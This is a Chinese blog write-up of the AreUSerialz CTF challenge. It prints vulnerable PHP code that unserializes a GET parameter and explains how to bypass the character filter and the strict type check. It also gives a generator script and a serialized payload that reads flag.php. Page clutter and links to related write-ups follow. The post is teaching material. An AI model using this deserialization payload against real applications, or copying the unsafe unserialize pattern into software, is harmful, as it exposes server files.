BUU-[网鼎杯 2020 青龙组]AreUSerialz

最新推荐文章于 2024-08-05 09:39:44 发布
最新推荐文章于 2024-08-05 09:39:44 发布
阅读量3.6k 收藏
点赞数 2
分类专栏: CTF 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54786552/article/details/123418920
版权

在这里插入图片描述

分析一下他给的代码:

 <?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

😇😇😇😇😇😇😇
function __destruct()
反序列化过程中,__destruct析构方法
op=2时,赋值op=1 content置为空,调用process();
这里的 if 中的判断语句用的是强类型比较

public function process()
op=1执行write();
op=2执行read(),将结果赋值给$res,然后输出;
其余情况输出"Bad Hacker!";
弱类型比较

private function read()
filename调用file_get_contents函数将文件内容赋值给$res输出

需要绕过:

  • is_valid()函数规定字符的ASCII码必须是32-125,而protected属性在序列化后会出现不可见字符\00*\00,转化为ASCII码不符合要求
  • __destruct()中,op="2"是强比较,而process()使用的是弱比较op=“2”,可以通过弱类型绕过。

尝试解决:

  • PHP7.1以上版本对属性类型不敏感,public属性序列化不会出现不可见字符,可以用public属性来绕过过滤
  • op=2
<?php
class FileHandler {
    public $op = 2;
    public  $filename = "flag.php";
    public  $content = "1";
} 
$a = new FileHandler();
echo serialize($a);
?>

run出来的str:

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:1:"1";}

传一下str源码中就有flag了…
在这里插入图片描述在这里插入图片描述

何小仙_
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[网鼎杯 2020 青龙]AreUSerialz 1
bazzza的博客
12-21 2202
打开靶场,是一道php代码审计的题目,是个反序列化的题目 分块对代码进行分析,先分析输入部分 function is_valid($s) { for($i = 0; $i < strlen($s); $i++) if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))//限制字符串的范围 return false; return true; } if(isset($_GET{'st
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7045
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
buuctf - [网鼎杯 2020 青龙]AreUSerialz
qq_40860153的博客
10-11 2564
1.题目源码 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
web | CTF】BUUCTF [网鼎杯 2020 青龙]AreUSerialz
weixin_46301214的博客
02-17 883
改动2:在op前面增加\00*\00,因为私有属性是会自带 * 号,需要用\00来截断(原理不清楚)先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的。看了一下只有读文件函数是有用的,那就要 $op=2 或者$op='2' 才行。奇怪的地方:$op是整数2,不能是字符串的2,很奇怪,明明字符串的2也可以啊。天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了。天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz
m0_49025459的博客
05-02 702
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() {//魔术字符 $op = "1"; $filename = "/tmp/tmpfile"; $content.
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
m0_73734159的博客
11-27 1667
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
m0_73995922的博客
12-21 265
1.首先因为题目类型是protected,在我们进行序列化时会产生%00*%00,%00对应ASCII码0,这里我们可以利用php7.1+版本对属性类型不敏感,在序列化时将类型改为public。但是我们看到is_valid对我们的payload进行了限制 需要我们输入的字符串的字符ASCII码在32-125之间。2.然后是===强等绕过 可以将 op=(int)2 将op改为int类型。同时我们还需要绕过_destruct() 也就是绕过 op==='2'我们需要使op==2。查看源码得到flag。
[网鼎杯 2020 青龙]AreUSerialz1详解两种常用方法及php伪协议扩展
m0_73615178的博客
01-21 601
此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的。不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。没有new对象,所以以下__construct()魔术方法不会触发,直接删除。根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,当$op值强比较===不等于str(2),弱比较==等于2。按照常规方法,首先,我们先将代码复制到本地进行序列化构造,
BUU实战笔记——[网鼎杯 2020 青龙]AreUSerialz1
qq_51175992的博客
07-14 132
方向很明确的PHP反序列化题,找到两个特征之后,再找对象、属性及属性的值就可以做出来啦!
基于PHP+MySQL合开发的微信活动投票小程序源码系统 带完整的安装代码包以及搭建部署教程
codeji的博客
07-31 329
为了满足这一需求,我们推出了一款基于PHP+MySQL合开发的微信活动投票小程序源码系统,旨在帮助用户快速搭建和管理投票活动。该系统采用了PHP作为后端开发语言,结合MySQL数据库进行数据存储和管理,确保了系统的稳定性和可扩展性。同时,通过优化数据库查询和索引设计,提高了数据处理的效率,确保了在大量用户同时参与投票时系统的稳定运行。同时,系统还支持多种交互方式,如分享、评论等,增强了用户的参与感和互动性。同时,管理员可以自定义投票选项、设定投票时间、限制投票次数等,确保活动的灵活性和公平性。
[图解]SysML建模电磁轨道炮-01块定义图
rolt的专栏
08-04 780
它这个轨道炮领域跟这两个Actor
深入探索:使用PHP开发保利威Polyv云点播服务器API对接实践(一)(点播服务器 API、视频加密、跑马灯防录屏、自定义用户)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
08-01 591
屏幕录像是最难防范的一种视频盗版方式,保利威播放器提供的防录屏跑马灯功能,通过设定文字内容(一般是观众的身份ID信息)在视频上不规则滚动,以此来警示盗版者,达到视频版权保护的效果。另外在用户网站中,除了通过登录信息(cookies)验证观众是否有权限访问视频播放页面外,还可以通过保利威播放器验证观众是否有播放某一个视频的权限,从而实现对观众权限的双重验证。保利威接口请求方式,包含post和get两种方式,因此,需要做好两种请求方式的封装函数。
[RoarCTF 2019]Easy Calc1
kw741951的博客
07-31 297
由于页面中无法上传num,则输入 num,在num前加入一个空格可以让num变得可以上传,而且在进行代码解析时,php会把前面的空格去除。由于不能使用很多的字符,可以使用file_get_contents()函数,将ascii码转化为字符来绕过。num=var_dump(scandir(chr(47)))看到源代码有 calc.php,构造url打开。scandair可以列出指定路径中的文件目录。看到php审计代码,
vulhub:Apache解析漏洞apache_parsing
weixin_68416970的博客
08-01 497
vulhub漏洞复现:Apache解析漏洞apache_parsing
Java、PHP、Node 操作 MySQL 数据库常用方法
最新发布
qq_22232065的博客
08-05 659
可以防止 SQL 注入,提高安全性。对于相同结构但参数不同的 SQL 语句,预编译后执行效率更高。容易受到 SQL 注入攻击。每次执行都需要重新编译 SQL 语句,效率较低。在 Java 操作 MySQL 数据库的过程中,关键要点包括选择合适的连接方式(如 JDBC 驱动、连接池或 ORM 框架)以满足不同项目的需求。对于数据操作,使用 PreparedStatement 提高安全性和效率,同时注意合理的索引设计和 SQL 语句优化来提升性能。
关于企微群聊天工具功能的开发---PHP+JS+CSS+layui (手把手教学)
最美不过下雨天
08-01 383
php+js开发企业微信
mac 源码编译安装php8.3.9
牛奔的博客
08-01 392
前提条件 确保你已经安装了 Homebrew 和 Xcode Command Line Tools。你可以通过以下命令安装它们: /bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" xcode-select --install https://www.cnblogs.com...
反序列化漏洞靶机实战-serial
C233333235的博客
08-01 1451
下载地址为,安装好后开启靶机,这里并不需要我们去登录,直接扫描虚拟机nat模式下c网段的ip,看看哪个的80端口开放,然后直接去访问。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值